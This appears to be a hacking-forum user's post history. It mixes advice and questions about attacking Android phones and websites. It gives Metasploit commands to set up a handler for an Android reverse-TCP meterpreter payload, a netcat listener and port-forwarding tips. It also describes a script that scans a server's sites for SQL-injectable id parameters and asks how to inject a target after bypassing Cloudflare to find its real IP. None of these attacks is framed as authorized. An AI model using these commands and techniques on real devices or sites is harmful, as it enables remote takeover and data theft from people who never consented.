0o0michael0o0
-
Posts
13 -
Joined
-
Last visited
Posts posted by 0o0michael0o0
-
-
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT 24000
exploit -j
make sure that u have the port 24000 open on your router and link it to ur internal ip address
type in terminal nc -lvp 24000
and check if ur port is open throw this site http://www.canyouseeme.org/
if u get a connection from this site that means that all is good with u
that shall work fine
and if u want to use a dynamic dns
-
use burpsuit and check the post data , who knows may be u can inject the post data
-
If you can de-cloak the severs IP, or find it through other means such as whois archives or netcraft history, then you can point your hosts file at the real IP and then run your attacks. Doesn't mean the exploits work, which would still require a vulnerable version of SQL software and/or accepting unsanitized data input that you can manipulate. One of the quickest checks is replacing www.somesite.com with direct.somesite.com or direct-connect.somesite.com. These often expose the domains real IP, as well as brute forcing sub domains like mail.domain.com, or even ftp.domain.com
thnx digip , actually the site is very well protected and i tried to enumrate the dns with more than methoud but i got a question , if i get the real ip of the server , how can i make the sqlmap or havij for example use the real ip ?? i know that if i get the user of the site , i can do it like that http://127.0.0.0/~/user/etc
but what if i did`nt get the user of the site ? how can i inject the site after getting the real ip ? thnx in advance
-
there is a payload in metasploit make apk and hack the android
android/meterpreter/reverse_tcp
-
yeah sure i just thought it might be useful to share with you that script couse it works fine with me .
-
yeah sure i know but i did`nt hack the server , i`m just trying to explain my point :)
i will try to refine it , and plz u can edit my comments with the site and delete it for me :)
thnx
-
i know its not perfect , the script is simply searching for sql error for ex
ruby mick.rb 127.0.0.1 id
u will get that result -
nooo
ok try that i know that this server is vurnable to sql and u will understand what i mean :)
ruby mick.rb 127.0.0.1 id
-
the script is simply go to bing.com and write in the search ip:127.0.0.1 so it extract the server sites by that methoud
then it looks for sql error for example .php?id=1 ' it puts the ' for all the id found in the server and if it found any error will tell u that the site is vurnabel :)
-
sorry guys i deleted the script to refine it
-
i`m asking couse i had that problem before and i wonder is there a method to make the sql injection while the cloudflare is on
-
i wonder is there any method to make sql injection while cloudflare firewall protecting the server !! ?
how to bypass it ?
thnx in advance.
sql and cloudflare
in Questions
Posted
i had that problem before . i bypassed the cloudflare and i get the true ip adress for the target
now what to do next to inject the target site with sql for example ?!!